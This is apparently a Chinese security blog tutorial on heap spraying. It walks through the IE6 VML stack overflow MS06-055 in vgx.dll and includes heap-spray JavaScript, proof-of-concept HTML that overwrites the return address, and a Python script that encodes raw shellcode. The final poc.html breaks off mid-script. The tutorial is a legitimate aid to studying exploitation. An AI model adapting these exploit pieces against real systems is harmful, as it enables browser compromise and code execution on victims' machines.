<!DOCTYPE html>
<html lang="en">
<head>
  <link rel="manifest" href="/manifest.json">
  <link rel="apple-touch-startup-image" href="images/hexo.png">
  <link rel="apple-touch-icon" href="images/icons/icon-72x72.png">
<link rel="apple-touch-icon" sizes="152x152" href="images/icons/icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="images/icons/icon-192x192.png">
<link rel="apple-touch-icon" sizes="167x167" href="images/icons/icon-192x192.png">
  <meta charset="utf-8">
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    HeapSpray入门 |
    
    Migraine</title>
  
    <link rel="shortcut icon" href="/fujiang.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<script src="/js/pace.min.js"></script>

<meta name="generator" content="Hexo 4.2.0"></head>

<body>
<main class="content">
  <section class="outer">
  

<article id="post-HeapSpray" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>
  
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      HeapSpray入门
    </h1>
  
  




      </header>
    

    
      <div class="article-meta">
        <a href="/2019/10/22/HeapSpray/" class="article-date">
  <time datetime="2019-10-22T05:54:41.000Z" itemprop="datePublished">2019-10-22</time>
</a>
        
  <div class="article-category">
    <a class="article-category-link" href="/categories/Win%E6%BC%8F%E6%B4%9E/">Win漏洞</a>
  </div>

      </div>
    

    
      
    <div class="tocbot"></div>





    

    <div class="article-entry" itemprop="articleBody">
      


      

      
        <p>摘要:HeapSpray这个技术是IE漏洞利用中非常重要的一点，能够绕过很多利用一般技术很难绕过的保护机制（DEP/ASLR），虽然这并不是一种漏洞利用手法，但是这种手法确实值得我们去研究和掌握。</p>
  <a id="more"></a>



<h1 id="第一章Heap-Spray"><a href="#第一章Heap-Spray" class="headerlink" title="第一章Heap Spray"></a>第一章Heap Spray</h1><p>HeapSpray常见于浏览器漏洞利用中。</p>
<p>通常使用JavaScript创建大量由Nop和shellcode组成的字符串中。JavaScript运行的时候会将每一个字符串的数据存储在堆中的新块上。</p>
<p>堆的分配通常从起始地址向上增长。所以当我们在为字符串分配了200MB的内存之后，在50MB和200MB之间的大量内存空间都被我们的Nop所填充。此时如果程序存在漏洞，就能将EIP覆盖为这段内存空间的地址，程序将会被控制跳转执行到这些NOP指令并且最终滑向我们的shellcode。</p>
<p>需要注意的是，Heap Spray并不是类似栈溢出/UAF之类的漏洞利用方式，而是一种常见于浏览器攻击的shellcode布置方式，是在找到漏洞之后，为了绕过ASLR/DEP之类的保护机制的一类绕过技巧。</p>
<h2 id="1-1堆喷射原理"><a href="#1-1堆喷射原理" class="headerlink" title="1.1堆喷射原理"></a>1.1堆喷射原理</h2><p>在IE漏洞案例中，使用javascript申请200MB内存。其中的结构大概如下</p>
<p>分为200个1MB的块（slide），每个块由 大量的nops和一条shellcode组成。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">---1MB---</span><br><span class="line"></span><br><span class="line">nop</span><br><span class="line"></span><br><span class="line">nop</span><br><span class="line"></span><br><span class="line">nop</span><br><span class="line"></span><br><span class="line">shellcode</span><br><span class="line"></span><br><span class="line">---1MB---</span><br><span class="line"></span><br><span class="line">nop</span><br><span class="line"></span><br><span class="line">nop</span><br><span class="line"></span><br><span class="line">nop</span><br><span class="line"></span><br><span class="line">shellcode</span><br><span class="line"></span><br><span class="line">-----</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">.....</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">---1MB---</span><br><span class="line"></span><br><span class="line">nop</span><br><span class="line"></span><br><span class="line">nop</span><br><span class="line"></span><br><span class="line">nop</span><br><span class="line"></span><br><span class="line">shellcode</span><br><span class="line"></span><br><span class="line">-----</span><br></pre></td></tr></table></figure>





<p>当Javascript成功申请这些的内存的时候，这些数据会覆盖到0x0c0c0c0c的位置，这样只需要通过缓冲区溢出漏洞将EIP修改为0x0c0c0c0c就能跳转到这个位置。</p>
<p>而slide中存在大量的nops，只要EIP跳转到nops中就会顺利地滑动到shellcode执行，因为shellcode的长度相对于1MB是非常短的，所以成功率并不低。</p>
<h2 id="1-2-javascript堆管理"><a href="#1-2-javascript堆管理" class="headerlink" title="1.2 javascript堆管理"></a>1.2 javascript堆管理</h2><p>案例代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;script language&#x3D;&quot;javascript&quot;&gt;</span><br><span class="line"></span><br><span class="line">var nop&#x3D;&quot;\u9090\u9090&quot;;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">while(nop.length&lt;&#x3D;0x100000&#x2F;2)</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">​	nop+&#x3D;nop;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">var slide&#x3D;new Array();</span><br><span class="line"></span><br><span class="line">nop&#x3D;nop.substring(0,0x100000&#x2F;2-32&#x2F;2-4&#x2F;2-2&#x2F;2);</span><br><span class="line"></span><br><span class="line">alert(nop);</span><br><span class="line"></span><br><span class="line">for(var i&#x3D;0;i&lt;200;i++)</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">​	slide[i]&#x3D;nop;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.ax1x.com/2019/10/22/K8P311.png" alt=""></p>
<p>如图所示，堆内存只分配到了0x211000，而0x0ccc0000之后也不是我们分配的内存。</p>
<p>所以实验中，堆并没有为我们分配对应的内存空间，我查询了javascript的内存管理并没有找到具体原因，个人猜测可能是因为填充的数据都是相同的\u9090,所以内存就自动优化不进行分配了。可能是来自于windows系统的堆分配优化。</p>
<p>不过解决方案也很简单，实验中将slide添加上一段非\u9090的代码时，成功申请了大量堆内存，并且覆盖到了0x0c0c0c0c地址。</p>
<p>修改后的代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language&#x3D;&quot;javascript&quot;&gt;</span><br><span class="line"></span><br><span class="line">shellcode&#x3D;&quot;\u1234\u1234\u1234\u1234\u1234\u1234\u1234\u1234\u1234\u1234\u1234\u1234&quot;;</span><br><span class="line"></span><br><span class="line">var nop&#x3D;&quot;\u9090\u9090&quot;;</span><br><span class="line"></span><br><span class="line">while(nop.length&lt;&#x3D;0x100000&#x2F;2)</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">​	nop+&#x3D;nop;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">nop&#x3D;nop.substring(0,0x100000&#x2F;2-32&#x2F;2-4&#x2F;2-shellcode.length-2&#x2F;2);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;nop&#x3D;nop.substring(0,0x100000-32&#x2F;2-4&#x2F;2-2&#x2F;2);</span><br><span class="line"></span><br><span class="line">var slide&#x3D;new Array();</span><br><span class="line"></span><br><span class="line">for(var i&#x3D;0;i&lt;200;i++)</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">​	slide[i]&#x3D;nop+shellcode;</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;	slide[i]&#x3D;nop;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>



<p>成功分配堆内存，可以进入0x0c0c0c0c内存查看具体分配状况。</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8P86x.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8PX4J.png" alt=""></p>
<h1 id="第二章IE漏洞分析"><a href="#第二章IE漏洞分析" class="headerlink" title="第二章IE漏洞分析"></a>第二章IE漏洞分析</h1><p>让我们寻找一个相对方便入手的CVE调试来掌握堆喷射技术</p>
<h2 id="2-1MS06-055分析"><a href="#2-1MS06-055分析" class="headerlink" title="2.1MS06-055分析"></a>2.1MS06-055分析</h2><p>实验环境</p>
<p>系统版本：Windows XP SP1</p>
<p>IE版本：IE6（IE5.x或6.x均可）</p>
<p>Vgx.dll版本：6.0.2800.1106（低于6.0.2900.2997即可）</p>
<h2 id="2-1-1-漏洞简介"><a href="#2-1-1-漏洞简介" class="headerlink" title="2.1.1 漏洞简介"></a>2.1.1 漏洞简介</h2><p>MS06-055漏洞的出发点在IE浏览器的vgx.dll中，</p>
<p>该文件的可以在C:\Program Files\CommonFiles\Microsoft Shared\VGX\下找到</p>
<p>漏洞成因是SHADETYPE_TEXT::Text(ushortconst *,int)函数对&lt;v:fill&gt;标签的method属性的值缺乏长度检查而导致的栈溢出。</p>
<h2 id="2-1-2-VML简介"><a href="#2-1-2-VML简介" class="headerlink" title="2.1.2 VML简介"></a>2.1.2 VML简介</h2><p>vml_test.html</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;html xmlns:v&#x3D;&quot;urn:schemas-microsoft-com:vml&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;head&gt;</span><br><span class="line"></span><br><span class="line">&lt;title&gt;migraine&lt;&#x2F;title&gt;</span><br><span class="line">&lt;style&gt;</span><br><span class="line"></span><br><span class="line">&lt;!--v\:* &#123; behavior: url(#default#VML); &#125;--&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;style&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line"></span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;v:rect style&#x3D;&quot;width:44pt;height:44pt&quot; fillcolor&#x3D;&quot;blue&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;v:fill method&#x3D;&quot;Q&quot; &#x2F;&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;v:rect&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">![img](file:&#x2F;&#x2F;&#x2F;&#x2F;var&#x2F;folders&#x2F;lv&#x2F;mx34g1z16nl89qtd0_3rqjk00000gn&#x2F;T&#x2F;com.kingsoft.wpsoffice.mac&#x2F;wps-p0kerface&#x2F;ksohtml&#x2F;wpsqowSM7.jpg)</span><br></pre></td></tr></table></figure>



<h2 id="2-1-3-vgx-dll分析"><a href="#2-1-3-vgx-dll分析" class="headerlink" title="2.1.3 vgx.dll分析"></a>2.1.3 vgx.dll分析</h2><p>使用IDA分析vgx.dll</p>
<p>IDA符号表导入方案</p>
<p>[不过由于windows xp现在已经下载不到符号表了，所以这次实验也就用不了]</p>
<p><a href="http://www.360doc.com/content/15/0705/16/12129652_482800639.shtml" target="_blank" rel="noopener">http://www.360doc.com/content/15/0705/16/12129652_482800639.shtml</a></p>
<p>触发漏洞的函数是_IE5_SHADETYPE_TEXT::TOKENS::TEXT,但是在没有载入符号表的情况下我们是无法直接在IDA中搜索的。尽管我们知道这个函数的地址为0x5AD02D1B</p>
<p>测试环境下Windows XP SP1的vgx.dll版本为6.0.2800.1106，如果系统不同，DLL版本不同也会造成偏差。下文会分析如何在没有符号表的情况下确定这个函数的位置。</p>
<p>不过，首先我们先对这个函数存在的漏洞进行分析。<br><img src="https://s2.ax1x.com/2019/10/22/K8PQh9.png" alt=""></p>
<p>实际漏洞触发函数是位于text：5AD02D5A 的call sub_5AD02CC0, 字符串没有检测长度，而产生栈溢出。进入这个函数，结合动态调试，确定loc_5AD02CDE-&gt;loc_5A02CFE构成的这个循环是造成溢出点的代码。</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8P1pR.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8PYnK.png" alt=""></p>
<p>0x5AD02CF8地址的存放是拷贝的代码，而0x5AD02D04则是循环判断代码。</p>
<p>[ecx+4]存放着输入数据的长度，edx每次循环加二，直到和输入字符串长度相等才停止。</p>
<p>没有存在任何长度的检查或者限制，所以这是导致栈溢出的原因。</p>
<p>动态调试也应证了我的判断，给拷贝字符串的命令下断点，此时DX存放的数据是0x0c就是我们要存放的数据，EDI存放着需要拷贝的地址。而观察此时[ECX+4] 的位置，也存放着我们字符串的长度，此处不再赘述。</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8PGX6.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8Pt0O.png" alt=""></p>
<h2 id="2-1-4-栈溢出调试"><a href="#2-1-4-栈溢出调试" class="headerlink" title="2.1.4 栈溢出调试"></a>2.1.4 栈溢出调试</h2><p>首先打开我们的vml_test.html,打开ImmunityDbg将进程附加到IE浏览器上。</p>
<p>此时因为我们的vml_test内部调用了vml所以IE自然会载入vgx.dll模块，通过模块查询可以发现，vgx.dll已经载入。</p>
<p>因为Windows XP并没有开启ASLR，所以vgx.dll的基地址和IDA预测的没有区别，直接Ctrl+G进入0x5AD02D1B下断点。</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8PN7D.png" alt=""></p>
<p>在地址栏中刷新我们的地址，可以看到程序断点在了存在漏洞的函数入口。这样如果需要调试poc，只需要修改我们的vml_test.html，然后刷新浏览器就能进行测试了。 <img src="https://s2.ax1x.com/2019/10/22/K8PdtH.png" alt=""></p>
<p>找到我们的vml_test.html中的参数&lt;v:fill method=”Q” /&gt;，增加method标签中Q的数量。再次进行调试</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8PB9A.png" alt=""></p>
<p>观察缓冲区我们填充的Q被存放在了缓冲区中，但是格式思路和我们期望的似乎有些不同。</p>
<p>在两个字符之间多处了\x00的编码。原因是在VML在解析我们数据的时候使用的是UNICODE编码，而不是ASCII码，所以Q的ASCII码表示为\x51而在UNICODE下则会转化为\x00\x51，格式为\u0051</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8Pwhd.png" alt=""></p>
<p>_IE5_SHADETYPE_TEXT::TOKENS::Ptok函数的EBP为0x12C0D0，所以函数的返回地址位于0x12C0D4，当然调试器也已经帮我标记好了这个地址。</p>
<p>而我们知道之前的缓冲区首地址为0x12BECC，所以我们需要在缓冲区填充0x20c的字节的才能覆盖返回地址。(也就是说0x106个Q)</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8PaAe.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8Prct.png" alt=""></p>
<p>我们编写POC.html,然后使用当前被调试的IE浏览器访问poc.html</p>
<p>观察此时的栈空间，返回地址已经被覆盖。</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8PsjP.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8PcB8.png" alt=""></p>
<p>显然，只能控制一半的字节是无法完成利用的（当然可以用unescape来输入ascii而不是unicode），在二进制格式中输入ascii（\x12）和unicode(\u1234)的区别我们已经知道。我们需要在method参数中输入unicode编码，需要遵循这种格式 ሴ</p>
<p>例如如下的参数，在内存中会这样显示</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;v:fill method&#x3D;&quot;&amp;#x1234&amp;#x1234&amp;#x1234&amp;#x1234&amp;#x1234&amp;#x1234&amp;#x1234&quot; &#x2F;&gt;!</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.ax1x.com/2019/10/22/K8PD1I.png" alt=""></p>
<p>如此构建payload #python -c “print ‘&amp;#x0c0c’*0x106”</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;v:fill method&#x3D;&quot;&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c....&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&quot; &#x2F;&gt;</span><br></pre></td></tr></table></figure>



<p>不过调试过程出现报错，因为MOV DS:[EAX],EBX (EAX=0x0c0c0c0c)向一个不可写的位置写数据。</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8P6nf.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8PRAg.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8PgHS.png" alt=""></p>
<p>抓住罪魁祸首，这句话读取EBP-4位置的数据（位于下图中0x12ccc的位置），存入EAX。</p>
<p>话说EBP-4这个位置让我打了一个寒颤，难道这个DLL开了StackCookie？</p>
<p>不过找到了EAX数据的来源，那我们就将其改为一个可以读取的地址（内存中被标为W的都行，例如0x0012011）。（可以直接用调试器修改寄存器的值）</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8PWNQ.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8Pfhj.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8P49s.png" alt=""></p>
<p>poc.html</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;html xmlns:v&#x3D;&quot;urn:schemas-microsoft-com:vml&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;head&gt;</span><br><span class="line"></span><br><span class="line">&lt;title&gt;migraine&lt;&#x2F;title&gt;</span><br><span class="line">&lt;style&gt;</span><br><span class="line"></span><br><span class="line">&lt;!--v\:* &#123; behavior: url(#default#VML); &#125;--&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;style&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line"></span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;v:rect style&#x3D;&quot;width:44pt;height:44pt&quot; fillcolor&#x3D;&quot;blue&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;v:fill method&#x3D;&quot;&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c...#x0011&amp;#x0012&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&quot; &#x2F;&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;v:rect&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>

<p>到目前位置栈溢出漏洞的利用已经告一段落,上文已经给出我们的poc，接下来就到了本部分的重头戏–Heap Spray.</p>
<h2 id="2-1-5-堆喷射利用"><a href="#2-1-5-堆喷射利用" class="headerlink" title="2.1.5 堆喷射利用"></a>2.1.5 堆喷射利用</h2><p>1.对shellcode编码</p>
<p>首先我们将shellcode编码为unicode，因为javascript只读取unicode格式。我们在这里可以使用python对shellcode进行编码。直接贴上脚本。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">\#!&#x2F;usr&#x2F;bin&#x2F;python</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line">shellcode&#x3D;&quot;\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C&quot;</span><br><span class="line"></span><br><span class="line">shellcode+&#x3D;&quot;\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53&quot;</span><br><span class="line"></span><br><span class="line">shellcode+&#x3D;&quot;\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B&quot;</span><br><span class="line"></span><br><span class="line">shellcode+&#x3D;&quot;\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95&quot;</span><br><span class="line"></span><br><span class="line">shellcode+&#x3D;&quot;\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59&quot;</span><br><span class="line"></span><br><span class="line">shellcode+&#x3D;&quot;\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A&quot;</span><br><span class="line"></span><br><span class="line">shellcode+&#x3D;&quot;\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75&quot;</span><br><span class="line"></span><br><span class="line">shellcode+&#x3D;&quot;\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03&quot;</span><br><span class="line"></span><br><span class="line">shellcode+&#x3D;&quot;\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB&quot;</span><br><span class="line"></span><br><span class="line">shellcode+&#x3D;&quot;\x53\x68\x61\x69\x6E\x65\x68\x6D\x69\x67\x72\x8B\xC4\x53\x50\x50&quot;</span><br><span class="line"></span><br><span class="line">shellcode+&#x3D;&quot;\x53\xFF\x57\xFC\x53\xFF\x57\xF8&quot;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">print &quot;shellcode(Unicode)&#x3D;&quot;,</span><br><span class="line"></span><br><span class="line">for i in range(0,len(shellcode),2):</span><br><span class="line"></span><br><span class="line">​        unicode_right&#x3D;shellcode[i]</span><br><span class="line"></span><br><span class="line">​        unicode_left&#x3D;shellcode[i+1]</span><br><span class="line"></span><br><span class="line">​        unicode&#x3D;unicode_left+unicode_right</span><br><span class="line"></span><br><span class="line">​        print &quot;\b\\u&quot;+unicode.encode(&#39;hex&#39;),</span><br></pre></td></tr></table></figure>



<p>脚本编写方面的笔记</p>
<p>1.Python 2如果要print不换行只需要加一个逗号，但是逗号需要产生一个空格，可以用/b去除。</p>
<p>2.str类型的要输出hex，需要使用encode函数。</p>
<p>输出的shellcode</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6961\u656e\u6d68\u6769\u8b72\u53c4\u5050\uff53\ufc57\uff53\uf857&quot;</span><br></pre></td></tr></table></figure>





<p>2.通过javascript产生堆空间</p>
<p>Javascript申请的堆空间会从0x00000000向内存高地址分配</p>
<p>如果申请200MB（0x0C800000）的内存一定会将0x0c0c0c0c覆盖。</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8PIcq.png" alt=""></p>
<p>完整的poc.html</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">&lt;html xmlns:v&#x3D;&quot;urn:schemas-microsoft-com:vml&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;head&gt;</span><br><span class="line"></span><br><span class="line">&lt;title&gt;migraine&lt;&#x2F;title&gt;</span><br><span class="line">&lt;style&gt;</span><br><span class="line"></span><br><span class="line">&lt;!--v\:* &#123; behavior: url(#default#VML); &#125;--&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;style&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line"></span><br><span class="line">&lt;script language&#x3D;&quot;javascript&quot;&gt;</span><br><span class="line"></span><br><span class="line">var 